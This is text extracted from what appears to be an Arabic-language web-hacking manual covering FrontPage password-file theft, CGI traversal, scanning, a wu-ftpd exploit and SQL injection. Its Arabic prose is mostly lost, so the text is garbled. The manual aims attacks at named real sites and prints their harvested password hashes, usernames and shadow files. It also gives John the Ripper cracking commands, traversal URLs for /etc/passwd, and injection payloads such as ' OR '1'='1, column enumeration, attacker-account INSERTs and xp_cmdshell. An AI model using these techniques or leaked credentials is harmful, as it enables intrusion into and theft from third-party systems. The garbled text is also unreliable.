* Microsoft Office
. FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
*
. Server Side Scripting
. Language
Screen
. Capture
@ :
.
438
.
. FrontPage Server
Extensions
. FrontPage Extension
Server
. FrontPage Extension
Server
. FrontPage.
@
* FrontPage Server
. Extensions
* .
* .
* .
.
@ :
439
PHP
CGI Perl SSL FTP . SQL
Webmasters
Microsoft Office FrontPage
Office
. .
@ FrontPage Server
Extensions
) : .
(
440
.
Server
.
:
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
:
* _: vti_bin
:
) : _
( vti_bin
441
/vti_adm_/..
/vti_aut_/..
.
:
shtml.exe/..
fpcount.exe/..
* _: vti_pvt
:
: service.pwd DES
.
: service.grp . authors
442
deptodoc.btr : doctodep.btr
.
.
htaccess.
. )
( .
) : .
(
* _: private
. htaccess.
@ FrontPage
Extension Server
443
FrontPage
Extension Server
. HTTP
FrontPage Request
. . FrontPage
Extension Server
.
fpcount.exe
Extension Server .
.
@ FrontPage Extension
: Server
FrontPage
444
FTP
. .
: FrontPage Extension Server
) : XP
.
(
* FrontPage
. Office
* File . Open Web
* )
( .
* .
.
*
445
.
@ FrontPage
. :
:
* :
) : _ vti_inf.html
(
. FrontPage. .
_ vti_inf.html :
http://www.Victim.com/_vti_inf.html
446
. Source Code
:vti_generator:Programe
Programe Microsoft
FrontPage X . X
* :
. FrontPage. .
. Source Code
> <Head></Head :
>"Meta Name="GENERATOR
<"Content="Programe
448
449
) :
.
(
Start Run . Telnet
80 :Microsoft Telnet> Open
www.Victim.com 80
Request. Method . Head
) : .
( HTTP
http://www.Victim.net
ISP.net
:
450
451
) : . .
PHP
(
* .
* PHP
:
>?PHP
;("open = FOpen($file, "r$
;((get = FGets($open, FileSize($file$
;Echo $get
;FClose $open
?<
PHP. .
452
file
:
http://www.Victim.com/uploded_file.
..../../etc/passwd
uploded_file
. .
453
454
"
"
> <
> :<
.//
NT - Unix
-1 .
frontpage.
455
:
netcraft/http://www.netcraft.com
mod_frontpage/x
)=x (
/_vti_inf.html
:
/http://www.almodammer.com
http://www.almodammer.com/_vti_i
nf.html
Enter
Frontpage Configuration
Information
.
456
/_vti_cnf
:
http://www.almodammer.com/_vti_c
nf
source
vti_generator:Programe
Programe
------------------------------------------------- -2 frontpage
frontpage
/http://www.almodammer.com
fontpage _vti_pvt
457
http://www.almodammer.com/_vti_p
vt
:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
username:passwd
.
service
user / password
458
operator:hi9LHn9wAMuKM
.operator:
hi9LHn9wAMuKM:
=)=(Crack Jack
=)=(John The Ripper
.
John The Ripper
::
http://www.openwall.com/john
\c:
RUN
txt passwd
459
start
run
command
Enter
DoS
RUN
.
cd..
>\c:
cd john
Enter
>c:\john
cd RUN
>c:/john/RUN
460
====
john -i:all passd.txt
-------------------------
====
john -i:Alpha passwd.txt
---------------------------------
====
john -i:Digits passwd.txt
--------------------------------- .
====
john -single passwd.txt
--------------------------------
.
461
------------------------------------------------------------------------------
john.pot
------------------------------------------------------------------------------ username
password
!!
/
)(1
frontpage
file
open web
462
)(2
FTP
FTP
ws-ftp
pro ftp
...
DOS
=============================
=========
google
/http://www.google.com
/_vti_pvt
463
/http://www.altavista.com
link:service.pwd
..
link:adminstrators
password
.
464
" "
><
> :<
Random Hacking465
CGIScripts
Random Hacking
spiders
altavista.com
) link:xxxx.cgi or pl
(
help.cgi link:help.cgi
Ikonboard
HTML
help.cgi
http://www.example.com/cgibin/help.cgi
http://www.example.com/cgi466
bin/help.cgi?helpon=../members/
[member].cgi%00
] [member
][
Ikonboard
2.1.7
CGIScript
url
Exploit
http://www.secure.f2s.com/eng_ver/
/bugs
/http://www.securiteam.com
467
....
...
CGIScripts
!!
(:
sites 12610 co.il
sites 1104 org.il sites 70
ac.il .sites 78 gov.il
.sites 54 net.il 29
.sites muni.il sites 2009
com .sites 137 net org -
.121 sites .edu - 4 sites
468
469
/w3-msql
proxy.isp.net.sa :8080
GET
cgi-bin/w3-msql
WWWMSQL
w3-msql
Exploit w3-msql
http://www.securiteam.com/exploits
/2WUQBRFS3A.html
Random Hacking
w3-msql
/vti_pvt_/
HTML *.
html ..
The page cannot be displayed
471
url c
perl Shell *.sh
Batch
perl exploit.pl exploit
(:
(:
> perl
exploit.pl > log.htm
Exploit
472
) ( RedHat 6.2
.
"
"
><
>< marwan911 :
. .
473
:IIS ) .
(
:apache
.
.
http://www.netcraft.net
474
whitehouse.org
: //:http /
http://uptime.netcraft.com/up/graph.
...whitehouse.org
The site www.whitehouse.org is
running Microsoft-IIS/5.0 on
Windows 2000
IIS5.0
. 2000
475
IIS5.0 )
(
. 2000
) (
IIS
.
.
476
.
www.arank.com
The site www.arank.com is running
)Apache/1.3.20 (Unix
mod_gzip/1.3.19.1a mod_perl/1.26
mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3
FrontPage/5.0.2.2510 mod_ssl/2.8.4
OpenSSL/0.9.6 on Linux
477
apache 1.3.20
FrontPage/5.0.2.2510
. Linux
.
_ vti_pvt _ private
service.pwd users.pwd
478
authors.pwd adminstators.pwd
)
%70
(
goodyco:CalXS8USl4TGM
http://www.goody.com.sa/_vti_pvt/s
ervice.pwd
goodyco
CalXS8USl4TGM
john the
repaier
) (
john -i PASSWORD.FILE
479
.
.
.
telnet .
.
c
================
480
/http://neworder.box.sk
) ( IIS
apache
/http://www.ussrback.com
EXPLOITS
.. c perl
.
"
"
481
> <
>:
.
( -1. .
( - ) IIS (
( - ) apachc (
( -2 .
( -3
( -4
482
IIS
.
apachc
483
.
. .
" )>&<(
"
> <
> : <
* :. (:
* : D:
484
* : ,
.
* : ,
, !!
* : , (:
* : (:
:2 ,
. .
:2 D:
NT & Unix
, FrontPage
(:
:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
485
_vti_pvt
:
http://www.tradesystemlab.com/_vti
(: _pvt/service.pwd
service.pwd
:
-FrontPage- #
tradesys:FpNTpIDWSk872
. (:
:3 ,
S:
: .
, WS_FTP www
ftp ftp.ebnmasr.com :
,
. (:
:4
. :
486
tradesys:FpNTpIDWSk872 )(N
:4 !! ,
John The
, Ripper :
http://www.openwall.com/john
:5 , . ,
:5 !! , , (:
: ,
, doc & run :
, run :
: p:
command.com :
, run
:
tradesys:FpNTpIDWSk872
txt passwd run
, , john.exe
command.com :
487
:6 , ,
:6 . ,
;( , .
(:
488
:7 , ) , (Y
.
:7 :
, tradesys:FpNTpIDWSk872
. ) tradesys :
( :
:8 ,
$:
:8 ,,, ;( ,
,
) ( D:
(:
:9 ,
, (:
: , :
. spiders
489
,
. ,
, walla.co.il :
,
;( .
:10 ,
, !!
:10 .
, $:
, ,
,(: (: service.pwd :
(:
:11 , ,
(:
:11
, EXPLOITES
, , (:
490
, EXPLOITES
. /http://www.ussrback.com :
" CgiScaner
"
><
> : <
491
1.
2 .
3 .
4 .
.
..
http://mypage.ayna.com/vox9
9/cgiscan3.zip
492
"
"
> <
> :<
::: .
493
,,,
,,
.
.
...
494
. ::
27374 . 1243
495
**
.
496
------------
+
........ ,,,,
497
...
http://mypage.ayna.com/a7lla
1/superscan.zip
---------------212.150.13.1
<--------212.150.32.255
-----------------62.0.150.1
<----------62.0.180.255
---------------199.203.75.1
<--------199.203.72.255
---------------139.92.208.1
<--------139.92.208.255
---------------192.114.42.1
<--------192.114.42.255
----------------216.72.43.1
<---------216.72.43.255
--------------212.143.113.1
<-------212.143.113.255
498
---------------209.88.198.1
<--------209.88.198.255
---------------212.29.238.1
<--------212.29.238.255
--------------193.128.102.1
<-------193.128.102.255
--------------192.117.236.1
<-------192.117.236.255
----------------213.8.204.1
<---------213.8.204.255
---------------212.25.120.1
<--------212.25.120.255
----------------128.139.1.1
<---------128.139.1.255
<-------------212.2.224.1
<------------212.2.227.255
<--------------212.26.1.1
<-----------212.26.255.225
<-------------213.238.0.1
<-----------213.238.20.255
<-------------212.102.1.1
499
<------------212.102.3.255
<-----------212.116.190.1
<----------212.116.195.255
<------------212.106.60.1
<-----------212.106.70.255
<-------------195.229.6.1
<-----------195.229.31.255
<-----------195.229.224.1
<----------195.229.255.255
<------------194.170.30.1
<-----------194.170.30.255
<--------------213.42.1.1
<-----------213.42.255.255
<--------------208.7.70.1
<-------------208.7.80.255
<-----------195.226.240.1
<----------195.226.255.255
<------------195.39.130.1
<-----------195.39.145.255
500
<-------------168.187.1.1
<----------168.187.255.255
<-------------194.133.1.1
<-----------194.133.255.25
<-------------209.58.40.1
<------------209.58.40.255
<------------206.82.133.1
<-----------206.82.133.255
<------------206.49.109.1
<-----------206.49.109.255
<--------------212.72.1.1
<-------------212.72.7.255
<------------193.188.50.1
<----------193.188.200.255
501
Shadow
Scan Security
http://www.safety-lab.com/SSS.exe
http://www.e3sar.net/almodammer/S
hadowSecurityScanner5.35.exe
503
:
=============================
===========
SetUp
:
+++++++++++
[] ][1
[] ][2 .
=============================
===========
504
*****& &*****
.
=)
Start
ShadowScanSecurity
(=
-1-
Scanner
-2-
505
=1
4 )
(
=2
=3
4
=4
=5
506
=6
=7
-3-
) (1 -2-
) (2
) (3
-4-
507
+1+
+2+
+ 3+
+4+
+ 5+ :-3-
+ 6+.
+ 7+
-5-
508
Done
-6-
Start Scan
509
1
-5-
"
"
510
> <
> : <
etc/shadow/
etc/shadow/
BSD
etc/master.passwd/
SGI ARIX
etc/shadow/
. . AIX
etc/security/shadow/
)) )) -
)) 64 64
(( (( ((
511
etc/shadow/
)) MD5 ((
)) (( NT - XP - 2000
)) (( LanMan
winnt/system32/config/sam/
)) .
.
((
)) ((
_.winnt/repair/sam or sam/
)) - ((
WINNT
.Windows
512
" ) ( "
> <
:
..
..
..
513
Telnet
..
Telnet .
.
Port
).(
) (Daemon
. .
:
)( )(
)( .. .
) (Telnet
) (Daemon
..
.. .
) .( )
( .
514
Telnet )
( ..
.
.
Daemon
.
ftp.zdnet.com 21
- Sources Code
l19-sj-zdnet.zdnet.com NcFTPd 220
.Server (licensed copy) ready
Banner FTP
Daemon. zdnet
.
.
-2 . .
Username .. Password
zdnet . Anonymous
. :
- Sources Code
516
user anonymous
.
- Sources Code
- Sources Code
517
pass @zorro
. Anonymous
.
..
)
) @
.
- Sources Code
518
..
..
. .
.
)
( .. !!
. . .
:
)( IP
. .
.. . .
:
PASV
- Sources Code
519
PASV
. IP
) . ( )(
..
- Sources Code
..
520
) ( IP
. .. 207,189,69,61
3113 = 41 + 256 12
. .. 3113
.
Telnet ftp.zdnet.com
.. 3113
..
( LIST.
(
- Sources Code
LIST
521
.
- Sources Code
Data connection already open; 125
.Transfer starting
.
.
.. PASV
.
522
..
) ( .
.. . CuteFTP!!
http://www.vbip.com/winsock/winso
ck_ftp_01.asp
) (
523
http://www.vbip.com/winsock/winso
( ) ck_ftp_ref_01.htm
http://www.cis.ohio )state.edu/htbin/rfc/rfc0959.html
.(
524
" ) ( "
> <
> :<
:
~~~~~~~~~
. password file password file
) (encryption ) (shadowed
525
-:
~~~~~~~~~
!
) ( Void Eye
526
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~
.
nmap
www.inscure.org/nmap
.
SuperScan
. Perl
Perl
C
( /http://www.7lem.com
. ping
(
)37 - 25 - 23 - 22 - 21
527
/telnet http://www.7lem.com
Windows Linux
SunOS FreeBSD QNX
Linux
...
Linux
---------------------SunOS 5.7
528
---------------------- login :
. SunOS 5.7
).
( .
.
nc http://www.7lem.com/ 80
---------------------.
.
.
Apache/1.3.* Server
.
.
---------------------
529
...
110 25
smtp pop
) ( Linux
host 7lem.com
-:
) (
-:
.
.... . queso
.
/queso http://www.7elm.com
530
queso 80
...
. SunOS 5.7
/http://www.condor.com )
support webmaster ... info (
DNS
.
whois . whois
whois
whois man whois
.
http://www.psyon.org/tools/index.ht
ml
. whois
531
?http://www.google.com/search
q=whois&btnG=Google+Search
~~~~~~~~~~~~~~~~~~~~~~~~~~
. void eye
ShadowSecurityScaner
!! .
532
Apache IIS
CGI Perl PHP
.
..
.
counter
mp3
Don't Tell Me
533
25 23 21
110
Ikonboard v2.1.8b
Ikonboard v2.1.8b
Ikonboard v2.1.7b
cgi pl
% 80
cgi
etc/passwd
. FreeBSD
shadow master.passwd
.. ...
534
++++++++++++++++++++++++
} http://www.fbunet.de/cgibin/nph-
{ %20%20%20%20%20.cgi CGI
....
: timduff.com
.
535
.
i'm from saudi arabia
. .
/../../../../../../../../../../../../../../../../../
/../
!
-:
-1
536
-2 .
.....
-3 ) Perl -
( Cgi
-4
%100
) (
-5
)
(
537
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~
/http://www.timduff.com
)
(
)( sh
shell
* sh.
shell
)(bat
538
)(
C
. gcc
gcc Exploit.c -o Exploit
) *c.
* C. c
++
)* (h.
(
Perl
)
(
539
....
= Exploit
password file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
540
----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer
Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp
Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/li
b/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access
User:/:
nobody4:x:65534:65534:SunOS 4.x
Nobody:/:
541
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/w
eb/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/
ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/s
h erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landma
rk:/bin/ksh
----------------------------------------------------------------------------------------------
10
.
......
542
~~~~~~~~~~~~~~~~~~~~~~~~~~
.
!...
* = x Shadowed
= EpGw4GekZ1B9U
DES .
FreeBSD
543
13
.
password file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~
Ctrl + Shift
544
... hwwilson.com
-:
root:x:0:1:Super-User:/:/sbin/sh
root
. root
x
x
0
.
545
Super-User:/:/sbin/sh
++++++++++++++++++++++++++++
) (encryption ) (shadowed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
shadow file
* x # !
root:x:0:1:Super-User:/:/sbin/sh
root:Q71KBZlvYSnVw:0:1:SuperUser:/:/sbin/sh
Q71KBZlvYSnVw
....
546
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~~
Crack 5.0a john
the ripper jack the ripper
Crack 5a john the
ripper .
john the ripper .....
547
-:
. wordlist.
.
--------------------------------------------------\ --------------------------------------------------> Q2wrtUo9LPq2R
| } ---> //{ | /---/
| / 1 / wordlist
| _____________ / 0 /
| }{ | | / 1 / / ---------^--------
| word list |----\ / 0
-> Q6LiJ6ct1oUBz /---/
| |_____________|
\ ------song--------// -----------------
..
|
-------------------------------------------------- | --------------------------- -:548
}{ | 5000 ) john
the ripper (700
|
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
john the ripper
john -w:wordlist passwd
wordlist
passwd
----------------------------------------------------------------------------------------------549
Microsoft(R) Windows 98
C)Copyright Microsoft Corp 1981).1998
E:\Desktop\junk\john the
ripper>john -w asswd passwd.txt
by Sola 97,John the Ripper Version
1.3 Copyright (c) 1996
Loaded 1 password
v: 0 c: 6401 t: 0:00:00:01 99% c/s:**
6401 w: *****DONE
E:\Desktop\junk\john the ripper<
---------------------------------------------------------------------------------------------- john.pot
550
...
brute
force
wordlist .
. 3
..
. wordlist
5000
wordlist
brute force
john the ripper.
brute force
john -i passwd
passwd
...
551
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~
Unshadow !!
) ( shadow file
.
:
552
root:EpGw4GekZ1B9U:11390::::::
::::::bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445
----------------------------------------------------------------------------------------------
passwd
shadow passwd file
...
http://wilsonweb2.hwwilson.com/etc
/passwd
----------------------------------------------------------------------------------------------root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
554
lp:x:71:8:Line Printer
Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp
Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/li
b/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access
User:/:
nobody4:x:65534:65534:SunOS 4.x
:/:Nobody
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/w
eb/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/
ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
555
jerome:x:106:1::/home/jerome:/bin/s
h erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landma
rk:/bin/ksh
---------------------------------------------------------------------------------------------- x token
etc/shadow/
http://wilsonweb2.hwwilson.com/etc
/shadow
----------------------------------------------------------------------------------------------root:XOT4AiUKMRcKQ:10643::::::
daemon:NP:6445::::::
bin:NP:6445:::::: sys:NP:6445::::::
adm:NP:6445:::::: lp:NP:6445::::::
smtp:NP:6445::::::
556
uucp:NP:6445::::::
nuucp:NP:6445:::::: listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911::::::
sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601::::::
admin:hDhB5YYKyWgQw:10976:::::
: jerome:XDqnOl32tPoGo:10976::::::
erl:0jE9Xem4aJYeI:10982::::::
::::::landmark:0jCgWu6vl8g0s:11185
---------------------------------------------------------------------------------------------- .
x
-:
557
...
-:
www.securiteam.com/exploits/archi
ve.html
/http://www.ussrback.com
+
/http://www.secureroot.com
/http://www.rootshell.com
558
/http://www.ussrback.com
www.secureroot.com/category/expl
oits
www.hitboss.com/Hacking
www.undergroundnews.com/resour
ces/s...ound/search.asp
Warez.com-Underground
/http://www.warez.com
Hacking
((
/http://www.neworder.box.sk
559
560
" ) ( "
> <
...
..
.....
561
....
* ) (host
* )
(passwd
/etc/passwd
shadow
562
passwd
dev
lib .
tmp
usr
.
. nt
nt.
admin.pwd
*
cgi-
bin cgi
564
php.cgi
/http://www.jewish.org
/http://www.jewish.org /cgi-bin
php.cgi
http://www.jewish.org/cgi bin/php.cgi.
scripts
565
http://www.jewish.org/scripts/php.c
gi
scripts winnt
cgi-bin
566
" )( "
><
>< ICER :
: ...
)(
...
(:
.
567
: *
(a) Linux (http://www.slackware.com
(b) Nmap (http://www.insecure.org
c) NetCat
/(http://www.l0pht.com/~weld/netcat
(
-:
) -1
( P:
: nmap -2
tar zxvf nmap.tar.gz (1*
cd nmap (2
configure && make && make/. (3
install
.. -3
www.target.com
. -4
nslookup www.target.com
569
196.1.2.3
-5
-: .
"nmap -sS -O 196.1.2.3"
-: .
root@IcEr:~# nmap -sS -O 196.1.2.3
Starting nmap V. 2.54BETA22
( /( www.insecure.org/nmap
Interesting ports on
:(www.target.com (196.1.2.3
The 1531 ports scanned but not)
(shown below are in state: closed
Port State Service
tcp open ftp/21
tcp open smtp/25
tcp open http/80
tcp open sunrpc/111
tcp open auth/113
tcp open printer/515
570
(: .
...
.
FTP ..
daemon
571
FTP daemon
-:
"telnet 196.1.2.3 21"
"ftp 196.1.2.3"
:
root@IcEr:~# ftp 196.1.2.3
.Connected to 196.1.2.3
www.target.com FTP server 220
(Version wu-2.6.0(1) Mon Mar 6
(13:54:16 SAST 2000
.ready
Name (target:root): anonymous
Guest login ok, send your 331
complete e-mail address as
.password
:Password
572
573
.
.wu-2.6.0
anonymous ;(
####### #######
7 8 -:
.FTPd
) (
wuftpd2600.c
. red hat
6.2
. .
root access
;(-
root@IcEr:~/# ./wuftpd2600 -t -s 0
196.1.2.3
574
..
man gcc
..
(:
search..U will find what U wanna
576
... ..
.. ..
annonymous
..
.. .
..
..
. ..
.. .
577
578
|
|
| *
| index
| * /
|
|
| *
| * .htpasswd
|
|
| * htaccess.
| * htaccess.
|
|
| *
|
| *
-------------------------------------------------*
-----------
,
.. . htaccess.
.
580
* htaccess.
---------------------- -1
-2 error
-3
index
-4/
-5 html ,.
.. .asp
-6
* htaccess.
--------------------------
" "Notepad
htacces.
txt. ,
581
" - "htaccess.
. -
* error
-----------------------
.
.
error
-:
- error
-
- htaccess.
ErrorDocument error_num
directory_file
582
. " error_num
directory_file "
error
.
:
ErrorDocument 404
/errors/nfound.html
- : errors
----------------------| Bad Syntax | 400 |
----------------------| Unauthorized | 401 |
----------------------|
Not Used | 402 |
----------------------| Forbidden | 403 |
----------------------| Not Found | 404 |
----------------------583
*
index
----------------------------------------------
index.
-:
- index "
"
-. htaccess.
-:
Options -Indexes
* /
------------------------------------ . htaccess.
584
..
- :
???deny from ???.???.???.
... .
-:
deny from all
-:
... allow from
...
*
------------------------------------585
Redirection
htaccess. .
. .
htaccess
-:
???Redirect/???.
???/somewhere/???.
http://www.site.com/newlocation
???.???/somewhere/
??/http://www.site.com/newlocation
? ???.
.
---------* .htpasswd
------------------------
586
. htaccess.
, . .
htaccess
htpasswd
-:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 . .
o EncryptedPwd1 ,
EncryptedPwd2
http://www.euronet.nl/~arnow/htpas
swd
http://www.e2.unet.com/htaccess/make.htm
587
Security
fu93hds3
http://www.euronet.nl/~arnow/htpas
swd
o username : Security
o passwrod & re-enter password :
fu93hds3
o claculate
Security:893bNicBcwszw <- htaccess.
. .
htaccess
.
* htaccess.
---------------------------
,
.
588
htaccess.
.
--:
AuthUserFile
/somewhere/.htpasswd
"
AuthName "Enter your user and
passed please
Require valid-user
AuthType Basic
require valid-user
><Limit/
o /somewhere/.htpasswd
htpasswd.
o Enter your user and passed
please
* htaccess.
----------------------------
,
..
- :
><Files .htaccess
590
order allow,deny
*
------------------------------ .
html. txt. .
-:
AddType text/plain html
-:
591
http://www.pharaonics.net/books/MI
ME.txt
Protocol
TCP/IP
FTP .
Formats
. ,FTP
.
. :
:
:Download
Host
.Local
:Uplaod
593
Local
.Host
:
:Secure FTP
.
. . .
:Anonymous FTP
.
. guest anonymous
.
.:
:Public Domain
. .
594
.
:Freeware
.
.
:Shareware
.
FTP :
:ASCII
595
: FTP
:
. . UNIX
.
:UNIX
:ascii ASCII
.
597
:binary
.
:status
ASCII .Binary
:help .UNIX
:dir
:ls .
:cd directory .
:get filename
.
:mget filename .
:pwd .
598
:bye . .
. :Shell
Tripod Unix Shell
ftp :
ftp ftp.tripod.com
" "IronPrivate .
"******" .
. Unix.
. Unix
:
http://www.pcworlds.net/lunexx.html
. .
599
. :Browser
URL
ftp:// http://
FTP
.
. :SLIP/PPP
. .Client Programs
Windows .Ws_ftp
. :Ws_ftp LE 5.06
Session
Profile .
600
Profile Name
My Home Page In
Tripod Host Name
ftp.tripod.com
Host Type Auto Detect .
.
User ID
IronPrivate
Password .
****** , .OK :
601
.
...
.
.
.
:Telnet
Telnet
.
. .
. . .
Windows . .
""
.
602
" "FTP
603
> <
>< hacker dz :
. .
FTP
.
21
FTP
Superscanne
Start
Run
604
ftp n
<FTP
.
Open
Enter
<FTP
To
To
Connected to www.assassin.com
websrv1 Microsoft FTP Service 220
.((Version 4.0
605
20
.
Pwd
Cd
.
Cd black
.
Ls
Get
Get black.exe
Put
Get
607
Put black.exe
Clos
.
:Codes:
Signification
.Restart marker reply
110
Service ready in nnn
120
(minutes. (nnn est un temps
Data connection already
125
.open; transfer starting
File status okay; about to
150
.open data connection
.Command okay
200
Command not
202
608
.File status
213
.Help message
214
.NAME system type
215
.Service ready for new user
220
Service closing control
221
.connection
Data connection open; no
225
.transfer in progress
.Closing data connection
226
Entering passive mode (h1,
227
.(h2, h3, h4, p1, p2
.User logged in, proceed
230
Requested file action okay,
250
.completed
609
.PATHNAME" created"
257
User name okay, need
331
.password
.Need account for login
332
Requested file action
350
.pendingfurther information
Service not available,
421
.closing control connection
.Can't open data connection
425
Connection closed; transfer
426
.aborded
Requested file action not
450
taken. (Fichier dj utilis par autre
(chose
Requested action aborded:
451
.local error processing
Requested action not taken.
452
(Pas assez de mmoire pour
(excuter l'action
Syntax error, command
500
.unrecognized
Syntax error in parameters
501
610
.or arguments
Command not
502
.implemented
Bad sequence of
503
.commands
Command not implemented
504
.for that parameter
.Not logged in
530
Need account for storing
532
.files
Requested action not taken.
550
(Fichier non trouv, pas d'accs
(...,possible
Requested action aborded:
551
.page type unknown
Requested file action
552
.aborded
Requested action not taken.
553
((Nom de fichier non attribu
611
:
SQL
PHP ASP
_LinuxRay
-. - -
. Administrator
...
:
613
SQL
User Name Passwd
: .
User name
and Passwd ASP
* sql.
htr.+
. :
http://target/page.asp+.htr
: target
: Page asp
: htr.+
.
....
614
View
ASP Source
:
%>
Set DB=
Server.CreateObject("ADODB.Conn
("ection
DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;
APP=Microsoft (R) Developer
Studio;WSID=xxx;DATABASE=moe
"_dbs", "_LinuxRay", "6666666
<%
---------------------------------------------------------------_ .
615
LinuxRay
6666666
----------------------------------------------------------------
ASP :
AMicrosoft VBScript runtime error
''800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.
.
.
616
ASP
database.inc
>!<--"include file = "database.inc#--
global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
617
:
global.asa+.htr
IIS 3
ASP data$::
file.asp::$data
IIS 3
.
...
.
!! SQL
.
Visual interdev 6.0
. ACCESS 2000
File
618
New
(Project (Exiting Data
.
Create
Data Link Properties
-
. -
- 1 Select or
enter server name
- 2 . User Name
- 3 Password
) Blank
619
(Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .
. ,
PHP ASP
.
SQL Server , MySQL,Oracle
.
.
SQL
.
.
. .
.
. (:
((((:
.
.
SQL
621
.
.
.
.
.
SQL
.
SQL injection
/http://www.stc.com.sa
http://www.stc.com.sa/arabic/script
s/ar_frame.asp?pagenum=25
.
!!!!
SQL
622
injection
.
' : .
' :
:
623
SQL
SQL inject
. Query
.
SQL injection
624
.
. .
:code
SELECT * from Users
WHERE User_Name='<field
from web form>' AND
Password='<field from
'<web form
}( if( TRUE
Login OK
{
} else
Login FAILD
{
.
.
.
625
. admin :
t0ps3cr3t :
SQL :
:code
SELECT * from Users
WHERE
Users_Name='admin' AND
'Password='t0ps3cr3t
User
. admin
t0ps3cr3t
. TRUE
. .
FALSE
:
. SQL
> <field from web form
626
.
' .
SQL :
:code
SELECT * from Users
' ' '=WHERE User_Name
' ' '=AND Password
!!
. . . blah' OR '1'='1 :
.
SQL
:code
SELECT * from Users
'WHERE User_Name='blah
OR '1'='1' AND
627
Password='blah' OR
''1'='1
SELECT * from Users
Users
WHERE User_Name='blah' OR
'1'='1' AND Password='blah' OR
''1'='1
. .
''blah' OR '1'='1
OR
''blah
TRUE
''1'='1
1 1. !!!!
628
TRUE OR
TRUE
TRUE
: TRUE
TRUE
. . TRUE
TRUE. SQL injection
.
Users
.....
SQL
WHERE
. (two dashes) --
,
. --'blah' OR '1'='1 :
629
)
--
SQL .
having clause .
'having 1=1-- .
Microsoft OLE DB Provider for
'ODBC Drivers error '80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]Column
'cs_isp_user.UserID' is invalid in the
select list because it is not
contained in an aggregate function
.and there is no GROUP BY clause
Arabic/Scripts/ar_csd_reply.asp,/
line 33
630
. group by
'group by cs_isp_user.UserID- passwd
group by-cs_isp_user.UserID,cs_isp_user.pa
'sswd
. !
.
. :
. blah' group by :
--((username
:
:
631
username
password .
,username,id,userid,email
first_name,
userid
:
632
cs_isp_user
passwd
. .
blah' group : . .
633
--(by (passwd
:
:
UserID
634
userid
MS SQL Server
(:
UserID passwd
. .
.
(:
. . blah' :
INSERT INTO
cs_isp_user(UserID,passwd
( --('VALUES('M_3','hi
. .
M_3 hi
) (
inject
635
id
. ) (
user
id
username )
.( admin1
passwd
union
)
(
. blah' union SELECT :
username FROM user
:
636
id .
blah' union SELECT
username,username FROM user
.
blah' union SELECT
637
username,username,usernam
e,username,username FROM user
:
.( :
). SQL
638
(Lame_Admin ) (int
, .
Lame_Admin
(: microsoft
(:
.
. blah' union:
SELECT
passwd,passwd,passwd,pass
wd,passwd FROM user
.
:
.
. .
.
Stored Procedure
Built-
in.
Stored Procedure
SQL Server . sa
. SQL
Server
640
SQL
Server
Stored Procedure 100
---------------------------+
--------------------------------------------------+
+---------------------------| |----------xp_cmdshell .
)
.(|-------
| |-----------xp_regread
-----------------------------------------
|--| |----xp_regdeletekey
-----------------------------------------
|-------| |-xp_regdeletevalue
-----------------------------------------
|--| |---------- xp_regwrite
641
-----------------------------------------
|-------------| |--xp_servicecontrol
--------------------------------------------
|
----------------------------+
--------------------------------------------------+
